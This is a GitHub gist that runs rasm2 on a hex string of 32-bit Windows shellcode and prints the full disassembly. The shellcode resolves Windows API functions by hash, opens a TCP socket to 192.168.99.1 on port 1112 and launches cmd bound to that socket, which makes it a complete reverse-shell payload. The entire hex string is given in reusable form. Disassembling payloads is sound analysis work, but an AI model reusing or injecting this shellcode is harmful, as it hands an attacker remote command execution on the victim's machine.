Skip to content

Instantly share code, notes, and snippets.

@pich4ya
Created August 25, 2018 02:11
Show Gist options
  • Save pich4ya/71d12314111878c1d2bcbdcad20f5d52 to your computer and use it in GitHub Desktop.
Save pich4ya/71d12314111878c1d2bcbdcad20f5d52 to your computer and use it in GitHub Desktop.
$ rasm2 -a x86 -D 'fce8820000006089e531c0648b50308b520c8b52148b72280fb74a2631ffac3c617c022c20c1cf0d01c7e2f252578b52108b4a3c8b4c1178e34801d1518b592001d38b4918e33a498b348b01d631ffacc1cf0d01c738e075f6037df83b7d2475e4588b582401d3668b0c4b8b581c01d38b048b01d0894424245b5b61595a51ffe05f5f5a8b12eb8d5d6833320000687773325f54684c772607ffd5b89001000029c454506829806b00ffd5505050504050405068ea0fdfe0ffd5976a0568c0a86301680200045889e66a1056576899a57461ffd585c0740cff4e0875ec68f0b5a256ffd568636d640089e357575731f66a125956e2fd66c744243c01018d442410c60044545056565646564e565653566879cc3f86ffd589e04e5646ff306808871d60ffd5bbf0b5a25668a695bd9dffd53c067c0a80fbe07505bb4713726f6a0053ffd5'
0x00000000 1 fc cld
0x00000001 5 e882000000 call 0x88
0x00000006 1 60 pushal
0x00000007 2 89e5 mov ebp, esp
0x00000009 2 31c0 xor eax, eax
0x0000000b 4 648b5030 mov edx, dword fs:[eax + 0x30]
0x0000000f 3 8b520c mov edx, dword [edx + 0xc]
0x00000012 3 8b5214 mov edx, dword [edx + 0x14]
0x00000015 3 8b7228 mov esi, dword [edx + 0x28]
0x00000018 4 0fb74a26 movzx ecx, word [edx + 0x26]
0x0000001c 2 31ff xor edi, edi
0x0000001e 1 ac lodsb al, byte [esi]
0x0000001f 2 3c61 cmp al, 0x61
0x00000021 2 7c02 jl 0x25
0x00000023 2 2c20 sub al, 0x20
0x00000025 3 c1cf0d ror edi, 0xd
0x00000028 2 01c7 add edi, eax
0x0000002a 2 e2f2 loop 0x1e
0x0000002c 1 52 push edx
0x0000002d 1 57 push edi
0x0000002e 3 8b5210 mov edx, dword [edx + 0x10]
0x00000031 3 8b4a3c mov ecx, dword [edx + 0x3c]
0x00000034 4 8b4c1178 mov ecx, dword [ecx + edx + 0x78]
0x00000038 2 e348 jecxz 0x82
0x0000003a 2 01d1 add ecx, edx
0x0000003c 1 51 push ecx
0x0000003d 3 8b5920 mov ebx, dword [ecx + 0x20]
0x00000040 2 01d3 add ebx, edx
0x00000042 3 8b4918 mov ecx, dword [ecx + 0x18]
0x00000045 2 e33a jecxz 0x81
0x00000047 1 49 dec ecx
0x00000048 3 8b348b mov esi, dword [ebx + ecx*4]
0x0000004b 2 01d6 add esi, edx
0x0000004d 2 31ff xor edi, edi
0x0000004f 1 ac lodsb al, byte [esi]
0x00000050 3 c1cf0d ror edi, 0xd
0x00000053 2 01c7 add edi, eax
0x00000055 2 38e0 cmp al, ah
0x00000057 2 75f6 jne 0x4f
0x00000059 3 037df8 add edi, dword [ebp - 8]
0x0000005c 3 3b7d24 cmp edi, dword [ebp + 0x24]
0x0000005f 2 75e4 jne 0x45
0x00000061 1 58 pop eax
0x00000062 3 8b5824 mov ebx, dword [eax + 0x24]
0x00000065 2 01d3 add ebx, edx
0x00000067 4 668b0c4b mov cx, word [ebx + ecx*2]
0x0000006b 3 8b581c mov ebx, dword [eax + 0x1c]
0x0000006e 2 01d3 add ebx, edx
0x00000070 3 8b048b mov eax, dword [ebx + ecx*4]
0x00000073 2 01d0 add eax, edx
0x00000075 4 89442424 mov dword [esp + 0x24], eax
0x00000079 1 5b pop ebx
0x0000007a 1 5b pop ebx
0x0000007b 1 61 popal
0x0000007c 1 59 pop ecx
0x0000007d 1 5a pop edx
0x0000007e 1 51 push ecx
0x0000007f 2 ffe0 jmp eax
0x00000081 1 5f pop edi
0x00000082 1 5f pop edi
0x00000083 1 5a pop edx
0x00000084 2 8b12 mov edx, dword [edx]
0x00000086 2 eb8d jmp 0x15
0x00000088 1 5d pop ebp
0x00000089 5 6833320000 push 0x3233
0x0000008e 5 687773325f push 0x5f327377
0x00000093 1 54 push esp
0x00000094 5 684c772607 push 0x726774c
0x00000099 2 ffd5 call ebp
0x0000009b 5 b890010000 mov eax, 0x190
0x000000a0 2 29c4 sub esp, eax
0x000000a2 1 54 push esp
0x000000a3 1 50 push eax
0x000000a4 5 6829806b00 push 0x6b8029
0x000000a9 2 ffd5 call ebp
0x000000ab 1 50 push eax
0x000000ac 1 50 push eax
0x000000ad 1 50 push eax
0x000000ae 1 50 push eax
0x000000af 1 40 inc eax
0x000000b0 1 50 push eax
0x000000b1 1 40 inc eax
0x000000b2 1 50 push eax
0x000000b3 5 68ea0fdfe0 push 0xe0df0fea
0x000000b8 2 ffd5 call ebp
0x000000ba 1 97 xchg eax, edi
0x000000bb 2 6a05 push 5
0x000000bd 5 68c0a86301 push 0x163a8c0
0x000000c2 5 6802000458 push 0x58040002
0x000000c7 2 89e6 mov esi, esp
0x000000c9 2 6a10 push 0x10
0x000000cb 1 56 push esi
0x000000cc 1 57 push edi
0x000000cd 5 6899a57461 push 0x6174a599
0x000000d2 2 ffd5 call ebp
0x000000d4 2 85c0 test eax, eax
0x000000d6 2 740c je 0xe4
0x000000d8 3 ff4e08 dec dword [esi + 8]
0x000000db 2 75ec jne 0xc9
0x000000dd 5 68f0b5a256 push 0x56a2b5f0
0x000000e2 2 ffd5 call ebp
0x000000e4 5 68636d6400 push 0x646d63
0x000000e9 2 89e3 mov ebx, esp
0x000000eb 1 57 push edi
0x000000ec 1 57 push edi
0x000000ed 1 57 push edi
0x000000ee 2 31f6 xor esi, esi
0x000000f0 2 6a12 push 0x12
0x000000f2 1 59 pop ecx
0x000000f3 1 56 push esi
0x000000f4 2 e2fd loop 0xf3
0x000000f6 7 66c744243c0101 mov word [esp + 0x3c], 0x101
0x000000fd 4 8d442410 lea eax, [esp + 0x10]
0x00000101 3 c60044 mov byte [eax], 0x44
0x00000104 1 54 push esp
0x00000105 1 50 push eax
0x00000106 1 56 push esi
0x00000107 1 56 push esi
0x00000108 1 56 push esi
0x00000109 1 46 inc esi
0x0000010a 1 56 push esi
0x0000010b 1 4e dec esi
0x0000010c 1 56 push esi
0x0000010d 1 56 push esi
0x0000010e 1 53 push ebx
0x0000010f 1 56 push esi
0x00000110 5 6879cc3f86 push 0x863fcc79
0x00000115 2 ffd5 call ebp
0x00000117 2 89e0 mov eax, esp
0x00000119 1 4e dec esi
0x0000011a 1 56 push esi
0x0000011b 1 46 inc esi
0x0000011c 2 ff30 push dword [eax]
0x0000011e 5 6808871d60 push 0x601d8708
0x00000123 2 ffd5 call ebp
0x00000125 5 bbf0b5a256 mov ebx, 0x56a2b5f0
0x0000012a 5 68a695bd9d push 0x9dbd95a6
0x0000012f 2 ffd5 call ebp
0x00000131 2 3c06 cmp al, 6
0x00000133 2 7c0a jl 0x13f
0x00000135 3 80fbe0 cmp bl, 0xe0
0x00000138 2 7505 jne 0x13f
0x0000013a 5 bb4713726f mov ebx, 0x6f721347
0x0000013f 2 6a00 push 0
0x00000141 1 53 push ebx
0x00000142 2 ffd5 call ebp
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment